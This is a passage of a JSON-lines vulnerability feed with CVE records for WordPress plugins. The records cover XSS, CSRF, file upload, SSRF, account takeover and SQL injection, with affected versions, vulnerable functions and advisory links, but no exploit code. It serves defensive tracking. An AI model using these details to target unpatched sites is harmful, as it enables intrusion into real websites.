replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37cf63e3-9301-441d-9852-b2de83078b51?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37cf63e3-9301-441d-9852-b2de83078b51?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc6ea6d-29d8-4ad0-b0db-2540e8b3f9a9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/adc6ea6d-29d8-4ad0-b0db-2540e8b3f9a9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7822","slug":"quick-code","versionImpact":"1.0","description":"The Quick Code WordPress plugin through 1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3a5bdd7e-7dd5-4749-9fad-ff4d7df20273\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3a5bdd7e-7dd5-4749-9fad-ff4d7df20273\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8519","slug":"ultimate-member","versionImpact":"2.8.6","description":"The Ultimate Member \u2013 User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'um_loggedin' shortcode in all versions up to, and including, 2.8.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e394bb2-d505-4bf1-b672-fea3504bf936?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e394bb2-d505-4bf1-b672-fea3504bf936?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/core\\\/class-shortcodes.php#L433\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/blob\\\/7b8a7a7c039bde4539c07e049b19036192f1c133\\\/includes\\\/core\\\/class-shortcodes.php#L433\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-member\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1545\",\"name\":\"https:\\\/\\\/github.com\\\/ultimatemember\\\/ultimatemember\\\/pull\\\/1545\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160947\\\/ultimate-member\\\/tags\\\/2.8.7\\\/includes\\\/core\\\/class-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160947\\\/ultimate-member\\\/tags\\\/
2.8.7\\\/includes\\\/core\\\/class-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10510","slug":"adbuddy-adblocker-detection","versionImpact":"1.1.3","description":"The adBuddy+ (AdBlocker Detection) by NetfunkDesign WordPress plugin through 1.1.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca499752-b516-42e7-8c2f-18e4428a92c7\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ca499752-b516-42e7-8c2f-18e4428a92c7\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9698","slug":"crafthemes-demo-import","versionImpact":"3.3","description":"The Crafthemes Demo Import plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'process_uploaded_files' function in all versions up to, and including, 3.3. This makes it possible for authenticated attackers, with Administrator-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crafthemes-demo-import\\\/trunk\\\/inc\\\/Helpers.php#L421\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/crafthemes-demo-import\\\/trunk\\\/inc\\\/Helpers.php#L421\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e44dd0e8-e6e7-4a2d-b9ca-abd1de273092?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12324","slug":"unilevel-mlm-plan","versionImpact":"1.1.0","description":"The Unilevel MLM Plan plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unilevel-mlm-plan\\\/trunk\\\/includes\\\/admin\\\/settings\\\/view\\\/ump-epins-list.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unilevel-mlm-plan\\\/trunk\\\/includes\\\/admin\\\/settings\\\/view\\\/ump-epins-list.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe71e2b9-ddd7-4d6d-97e5-5fad41f8f35c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe71e2b9-ddd7-4d6d-97e5-5fad41f8f35c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13225","slug":"ect-homepage-products","versionImpact":"1.9","description":"The ECT Home Page Products WordPress plugin through 1.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8efd7d62-3f74-4108-970e-bd5ed24914ff\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8efd7d62-3f74-4108-970e-bd5ed24914ff\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13757","slug":"master-slider","versionImpact":"3.10.6","description":"The Master Slider \u2013 Responsive Touch Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ms_layer shortcode in all versions up to, and including, 3.10.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L815\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-slider\\\/trunk\\\/includes\\\/msp-shortcodes.php#L815\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-slider\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a7fb51-f40d-46b8-9f52-495716032a1b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26a7fb51-f40d-46b8-9f52-495716032a1b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2109","slug":"wp-compress-image-optimizer","versionImpact":"6.30.15","description":"The WP Compress \u2013 Instant Performance & Speed Optimization plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 6.30.15 via the init() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.15\\\/wp-compress-core.php#L994\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-compress-image-optimizer\\\/tags\\\/6.30.15\\\/wp-compress-core.php#L994\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254259\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3254259\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-compress-image-optimizer\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b9d703-de9d-472a-bdfb-bc9a41bf375e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10b9d703-de9d-472a-bdfb-bc9a41bf375e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5122","slug":"map-block-leaflet","versionImpact":"3.2.1","description":"The Map Block Leaflet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/map-block-leaflet\\\/trunk\\\/build\\\/leaflet-map-block\\\/render.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/map-block-leaflet\\\/trunk\\\/build\\\/leaflet-map-block\\\/render.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302407\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302407\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/map-block-leaflet\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/map-block-leaflet\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/372f1cf3-df33-444c-b31e-8f71d128e30b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/372f1cf3-df33-444c-b31e-8f71d128e30b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3848","slug":"smartpay","versionImpact":"2.7.13","description":"The Download Manager and Payment Form WordPress Plugin \u2013 WP SmartPay plugin for WordPress is vulnerable to privilege escalation via account takeover in versions 1.1.0 to 2.7.13. This is due to the plugin not properly validating a user's identity prior to updating their email through the update() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartpay\\\/tags\\\/2.7.13\\\/app\\\/Http\\\/Controllers\\\/Rest\\\/CustomerController.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/smartpay\\\/tags\\\/2.7.13\\\/app\\\/Http\\\/Controllers\\\/Rest\\\/CustomerController.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c197e26f-745b-481a-a7b5-79d1211c02ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c197e26f-745b-481a-a7b5-79d1211c02ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-46848","slug":"visualizer","versionImpact":"3.9.1","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Themeisle Visualizer: Tables and Charts Manager for WordPress plugin <= 3.9.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/visualizer\\\/wordpress-visualizer-tables-and-charts-manager-for-wordpress-plugin-3-9-2-auth-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/visualizer\\\/wordpress-visualizer-tables-and-charts-manager-for-wordpress-plugin-3-9-2-auth-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2549","slug":"feather-login-page","versionImpact":"1.1.1","description":"The Feather Login Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions starting from 1.0.7 up to, and including, 1.1.1. This is due to missing nonce validation in the 'createTempAccountLink' function. This makes it possible for unauthenticated attackers to create a new user with administrator role via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. An attacker can leverage CVE-2023-2545 to get the login link or request a password reset to the new user's email address.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12560b8e-9c47-4f7f-ac9c-d86f17914ba3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12560b8e-9c47-4f7f-ac9c-d86f17914ba3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L206\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/feather-login-page\\\/trunk\\\/features\\\/inc\\\/admin\\\/expirable-login-link.php?rev=2612332#L206\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3295","slug":"unlimited-elements-for-elementor","versionImpact":"1.5.66","description":"The Unlimited Elements For Elementor (Free Widgets, Addons, Templates) for WordPress is vulnerable to arbitrary file uploads due to missing file type validation of files in the file manager functionality in versions up to, and including, 1.5.66 . This makes it possible for authenticated attackers, with contributor-level permissions and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. The issue was partially patched in version 1.5.66 and fully patched in 1.5.67","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_assets.class.php#L1005\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/unlimited-elements-for-elementor\\\/trunk\\\/inc_php\\\/unitecreator_assets.class.php#L1005\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce1ac711-6026-49ef-b66b-2cc199697942?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce1ac711-6026-49ef-b66b-2cc199697942?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3956","slug":"instawp-connect","versionImpact":"0.0.9.18","description":"The InstaWP Connect plugin for WordPress is vulnerable to unauthorized access of data, modification of data and loss of data due to a missing capability check on the 'events_receiver' function in versions up to, and including, 0.0.9.18. This makes it possible for unauthenticated attackers to add, modify or delete post and taxonomy, install, activate or deactivate plugin, change customizer settings, add or modify or delete user including administrator user.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.0.9.18\\\/includes\\\/class-instawp-rest-apis.php#L103\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/instawp-connect\\\/tags\\\/0.0.9.18\\\/includes\\\/class-instawp-rest-apis.php#L103\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942363\\\/instawp-connect#file5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942363\\\/instawp-connect#file5\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48e7acf2-61d4-4762-8657-0701910ce69b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48e7acf2-61d4-4762-8657-0701910ce69b?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1217","slug":"kali-forms","versionImpact":"2.3.41","description":"The Contact Form builder with drag & drop for WordPress \u2013 Kali Forms plugin for WordPress is vulnerable to unauthorized plugin deactivation due to a missing capability check on the await_plugin_deactivation function in all versions up to, and including, 2.3.41. This makes it possible for authenticated attackers, with subscriber access or higher, to deactivate any active plugins.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7be75b0a-737d-4f0d-b024-e207af4573cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7be75b0a-737d-4f0d-b024-e207af4573cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036466\\\/kali-forms\\\/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3036466\\\/kali-forms\\\/trunk?contextall=1&old=3029334&old_path=%2Fkali-forms%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1415","slug":"lead-form-builder","versionImpact":"1.8.9","description":"The Responsive Contact Form Builder & Lead Generation Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.8.9. This is due to missing or incorrect nonce validation on several functions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. These actions may result in form deletion, and lead signup as well as file upload.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8ce9ab4-d6d6-4e06-a042-145db02cf7ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8ce9ab4-d6d6-4e06-a042-145db02cf7ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L674\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L674\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/ajax-functions.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/lf-install.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lead-form-builder\\\/trunk\\\/inc\\\/lf-install.php#L57\",\
"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5663","slug":"bb-bootstrap-cards","versionImpact":"1.1.3","description":"The Cards for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Cards widget in all versions up to, and including, 1.1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55ff923e-9d04-4ce7-b6d6-165fa4fc5433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55ff923e-9d04-4ce7-b6d6-165fa4fc5433?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bb-bootstrap-cards\\\/trunk\\\/bb-bootstrap-cards-module\\\/includes\\\/frontend.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bb-bootstrap-cards\\\/trunk\\\/bb-bootstrap-cards-module\\\/includes\\\/frontend.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bb-bootstrap-cards\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bb-bootstrap-cards\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3099081%40bb-bootstrap-cards&new=3099081%40bb-bootstrap-cards&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3099081%40bb-bootstrap-cards&new=3099081%40bb-bootstrap-cards&sfp_email=&sfph_mail=#file4\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6054","slug":"auto-featured-image","versionImpact":"1.2","description":"The Auto Featured Image plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'create_post_attachment_from_url' function in all versions up to, and including, 1.2. This makes it possible for authenticated attackers, with contributor-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d1512c2-75c1-405b-8bb4-f42ec69159a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d1512c2-75c1-405b-8bb4-f42ec69159a7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-featured-image\\\/tags\\\/1.2\\\/auto-featured-image.php#L167\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auto-featured-image\\\/tags\\\/1.2\\\/auto-featured-image.php#L167\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7820","slug":"ilc-thickbox","versionImpact":"1.0","description":"The ILC Thickbox WordPress plugin through 1.0 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31b2c97b-2458-43ee-93db-e57968ac8455\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31b2c97b-2458-43ee-93db-e57968ac8455\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13224","slug":"slidedeck-lite-for-wordpress","versionImpact":"1.4.8","description":"The SlideDeck 1 Lite Content Slider WordPress plugin through 1.4.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a90907-e82f-41b3-b20e-d10a722e2999\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/32a90907-e82f-41b3-b20e-d10a722e2999\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13747","slug":"email-customizer-for-woocommerce-with-drag-drop-builder","versionImpact":"3.0.34","description":"The WooMail - WooCommerce Email Customizer plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'template_delete_saved' function in all versions up to, and including, 3.0.34. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject SQL into an existing post deletion query.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/email-customizer-for-woocommerce-with-drag-drop-builder-woo-email-editor\\\/22400984\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/email-customizer-for-woocommerce-with-drag-drop-builder-woo-email-editor\\\/22400984\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e74e1a7c-4fe6-4041-8c4c-13389dacb9db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e74e1a7c-4fe6-4041-8c4c-13389dacb9db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2635","slug":"digital-license-manager","versionImpact":"1.7.3","description":"The Digital License Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg() function without appropriate escaping on the URL in all versions up to, and including, 1.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-license-manager\\\/trunk\\\/includes\\\/ListTables\\\/Activations.php#L476\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/digital-license-manager\\\/trunk\\\/includes\\\/ListTables\\\/Activations.php#L476\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260900\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3260900\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/digital-license-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/digital-license-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a266e003-3a0a-4832-a88b-60c2a26b387c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a266e003-3a0a-4832-a88b-60c2a26b387c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
